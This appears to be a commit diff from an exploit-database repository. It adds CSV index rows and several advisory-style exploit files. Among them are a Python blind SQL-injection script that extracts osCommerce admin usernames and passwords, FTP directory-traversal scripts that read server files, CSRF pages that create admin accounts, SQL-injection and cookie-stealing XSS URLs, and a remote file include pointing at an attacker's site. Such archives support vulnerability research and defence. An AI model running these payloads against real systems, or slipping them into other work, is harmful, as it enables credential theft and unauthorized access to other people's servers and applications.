33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
@ -30660,3 +30660,15 @@ id,file,description,date,author,platform,type,port
34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0
34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0
34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0
34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",windows,remote,0
34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 'pbx/gate' Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",multiple,remote,0
34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 Cross Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0

Can't render this file because it is too large.

9
platforms/multiple/dos/34058.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40460/info
DM Database Server is a database application.
DM Database Server is prone to a remote memory-corruption vulnerability. This issue affects the 'CALL SP_DEL_BAK_EXPIRED' function when a large string is passed to the first argument.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

9
platforms/multiple/remote/34048.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40407/info
Brekeke PBX is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected.
<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html>

10
platforms/php/webapps/34049.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40415/info
Layout CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Layout CMS 1.0 is vulnerable; other versions may be affected.
http://www.example.com/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
http://www.example.com/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

95
platforms/php/webapps/34052.py Executable file
View file

@ -0,0 +1,95 @@
source: http://www.securityfocus.com/bid/40425/info
osCommerce Visitor Web Stats is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
import sys
import http.client
if len(sys.argv) < 2:
print("usage: " + sys.argv[0] + " <host> [<path>]")
sys.exit();
host = sys.argv[1]
if len(sys.argv) > 2:
path = sys.argv[2]
else:
path = "/"
def req(lang):
c = http.client.HTTPConnection(host)
c.request('GET', path, '', {'Accept-Language': lang})
return c.getresponse().read();
def check(condition):
r = req("' AND 1=0 UNION SELECT id FROM administrators " + condition
+ " -- '")
if r.find(b'update') != -1:
return 1;
elif r.find(b'Unknown column') != -1:
print('Unknown database structure (no rc version?)')
sys.exit();
return 0;
if req("'").find(b'select counter FROM visitors where browser_ip') == -1:
print('Target does not seem to have (a vulnarable version of)
Visitor Web Stats or doesn\'t output any error messages')
sys.exit();
admin_count = 1
while not check("HAVING COUNT(*) = " + str(admin_count)):
admin_count += 1;
print("Number of admins: " + str(admin_count))
pw_chars = [x for x in range(48, 58)]
pw_chars.extend([x for x in range(97, 103)])
pw_chars.sort()
todo = [('', 0, 255)]
while len(todo):
(found, start, end) = todo.pop()
if start == 0 and end == 255 and check("WHERE user_name = '" + found
+ "'"):
sys.stdout.write(found + " ")
sys.stdout.flush()
for i in range(35):
if i == 32:
sys.stdout.write(":")
sys.stdout.flush()
continue
pw_start, pw_end = 0, len(pw_chars) - 1
while pw_start != pw_end:
pw_mid = int((pw_start + pw_end) / 2)
if check("WHERE user_name = '" + found + "'
AND ORD(SUBSTRING(user_password, " + str(i + 1) + ", 1)) <= " +
str(pw_chars[pw_mid])):
pw_end = pw_mid
else:
if pw_mid == pw_end - 1:
pw_start = pw_end
else:
pw_start = pw_mid
sys.stdout.write(chr(pw_chars[pw_start]))
sys.stdout.flush()
print()
if not check("WHERE SUBSTRING(user_name, 1, " +
str(len(found)) + ") = '" + found + "' AND SUBSTRING(user_name, " +
str(len(found) + 1) + ", 1) > 0"):
continue;
mid = int((start + end) / 2)
if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
1)) <= " + str(mid) + " AND ORD(SUBSTRING(user_name, " + str(len(found) + 1)
+ ", 1)) > 0"):
if mid == start + 1:
todo.append((found + chr(mid), 0, 255))
else:
todo.append((found, start, mid))
if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
1)) > " + str(mid)):
if mid == end - 1:
todo.append((found + chr(end), 0, 255))
else:
todo.append((found, mid, end))

13
platforms/php/webapps/34053.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/40431/info
ImpressPages CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ImpressPages CMS 1.0.4 is vulnerable; prior versions may also be affected.
The following example URIs are available:
http://www.example.com/admin.php?module_id=329&security_token=$valid_token&page[0]=&page_size[0]=200+ANY_SQL_HERE+--++
http://www.example.com/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc

9
platforms/php/webapps/34054.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40437/info
GR Board is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects version 1.8.6.1; other versions may also be vulnerable.
http://www.example.com/path/page.php?theme=http://attacker's site

8
platforms/php/webapps/34055.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/40442/info
CMScout is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following example input to the 'search' field is available:
<marquee><font color=Blue size=15>XroGuE</font></marquee>

29
platforms/php/webapps/34056.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/40444/info
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects Joomla! versions prior to 1.5.18.
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

7
platforms/php/webapps/34057.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40447/info
wsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/news.php?id=<script><font color=red size=15>XSS</font></script>

74
platforms/windows/dos/34051.py Executable file
View file

@ -0,0 +1,74 @@
source: http://www.securityfocus.com/bid/40422/info
Core FTP Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Core FTP Server 1.0.343 is vulnerable; other versions may also be affected.
import sys, socket, re
host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'
buffer_size = 8192
timeout = 8
def recv(s):
resp = ''
while 1:
r = s.recv(buffer_size)
if not r: break
resp += r
return resp
def list_root():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)
print s.recv(buffer_size)
s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)
s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size) + s.recv(buffer_size)
s.send('CWD ' + '/...' * 16 + '\r\n')
resp = s.recv(buffer_size)
print resp
if resp[:3] == '250':
s.send('PASV\r\n')
resp = s.recv(buffer_size)
print resp
pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)
if (pasv_info == None):
print 'Invalid PASV response: ' + resp
return
s.send('LIST\r\n')
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
s2.settimeout(timeout)
print recv(s2)
s.close()
except Exception:
print sys.exc_info()
list_root()

9
platforms/windows/remote/34047.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40405/info
Home FTP Server is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
Home FTP Server 1.10.3 (build 144) is vulnerable; other versions may be affected.
<html> <body> <img src="http://www.example.com/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html>

111
platforms/windows/remote/34050.py Executable file
View file

@ -0,0 +1,111 @@
source: http://www.securityfocus.com/bid/40419/info
Home FTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to download, upload, and delete arbitrary files outside of the FTP server's root directory. This may aid in further attacks.
Home FTP Server 1.10.2.143 and 1.11.1.149 are vulnerable; other versions may also be affected.
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Directory Traversal #
# Software.................Home FTP Server 1.10.2.143 #
# Download.................http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe #
# Date.....................5/27/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and #
# delete files outside of the ftp root directory. #
# #
# #
# ##Exploit## #
# #
# RETR [Drive Letter]:\[Filename] #
# STOR [Drive Letter]:\[Filename] #
# DELE [Drive Letter]:\[Filename] #
# #
# #
# ##Proof of Concept## #
# #
import sys, socket, re
host = 'localhost'
port = 21
user = 'anonymous'
password = ''
timeout = 8
buffer_size = 8192
def get_data_port(s):
s.send('PASV\r\n')
resp = s.recv(buffer_size)
pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)
if (pasv_info == None):
raise Exception(resp)
return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))
def retr_file(s, filename):
pasv_port = get_data_port(s)
if (pasv_port == None):
return None
s.send('RETR ' + filename + '\r\n')
resp = s.recv(8192)
if resp[:3] != '150': raise Exception(resp)
print resp
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, pasv_port))
s2.settimeout(2.0)
resp = s2.recv(8192)
s2.close()
return resp
def get_file(filename):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)
print s.recv(buffer_size)
s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)
s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size)
print retr_file(s, filename)
print s.recv(buffer_size)
s.close()
get_file('c:\\boot.ini')